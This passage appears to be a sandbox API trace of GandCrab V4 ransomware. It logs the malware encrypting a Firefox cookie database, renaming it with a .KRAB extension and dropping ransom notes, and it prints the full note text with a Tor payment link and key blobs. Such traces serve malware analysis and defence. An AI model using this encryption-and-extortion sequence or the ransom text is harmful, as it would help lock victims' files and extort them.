pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0078.572] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0078.572] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.572] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010e80) returned 1 [0078.574] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe498) returned 1 [0078.574] CryptGetKeyParam (in: hKey=0xffe498, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.574] CryptEncrypt (in: hKey=0xffe498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.574] GetLastError () returned 0x0 [0078.574] CryptDestroyKey (hKey=0xffe498) returned 1 [0078.574] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0078.574] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010ce8) returned 1 [0078.576] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe818) returned 1 [0078.577] CryptGetKeyParam (in: hKey=0xffe818, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.577] CryptEncrypt (in: hKey=0xffe818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.577] GetLastError () returned 0x0 [0078.577] CryptDestroyKey (hKey=0xffe818) returned 1 [0078.577] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0078.577] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0078.578] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0078.578] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0078.579] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x80000, lpOverlapped=0x0) returned 1 [0078.630] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff80000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.631] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x80000, lpOverlapped=0x0) returned 1 [0078.635] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0078.636] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.640] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.642] CloseHandle (hObject=0x7ec) returned 1 [0078.650] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.651] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite.krab")) returned 1 [0078.652] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.652] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0078.653] lstrcmpW (lpString1="crashes", lpString2=".") returned 1 [0078.653] lstrcmpW (lpString1="crashes", lpString2="..") returned 1 [0078.653] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="crashes" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes" [0078.653] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\" [0078.653] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0078.693] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0078.693] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0078.693] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0078.693] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0078.693] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.694] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.694] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\\\KRAB-DECRYPT.txt") returned 105 [0078.694] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0078.703] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0078.703] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0078.704] CloseHandle (hObject=0x7ec) returned 1 [0078.704] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.705] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.705] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x19, wMilliseconds=0x38a)) [0078.705] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.706] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0078.706] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0078.706] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a08d2ca4dee3d.lock") returned 111 [0078.706] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0078.726] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.726] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.727] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\") returned 88 [0078.727] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*" [0078.727] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0xffe958 [0078.727] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.727] FindNextFileW (in: hFindFile=0xffe958, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.727] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.727] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.727] FindNextFileW (in: hFindFile=0xffe958, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.727] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0078.727] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0078.727] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a08d2ca4dee3d.lock" [0078.727] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.728] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 116 [0078.728] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a08d2ca4dee3d.lock") returned 111 [0078.728] lstrlenW (lpString=".lock") returned 5 [0078.728] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.728] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0078.728] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.728] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.729] FindNextFileW (in: hFindFile=0xffe958, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.729] lstrcmpW (lpString1="events", lpString2=".") returned 1 [0078.729] lstrcmpW (lpString1="events", lpString2="..") returned 1 [0078.729] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="events" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events" [0078.729] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\" [0078.729] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0078.729] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0078.729] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0078.729] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0078.729] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0078.729] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.730] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.730] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\\\KRAB-DECRYPT.txt") returned 112 [0078.730] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\events\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x720 [0078.731] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 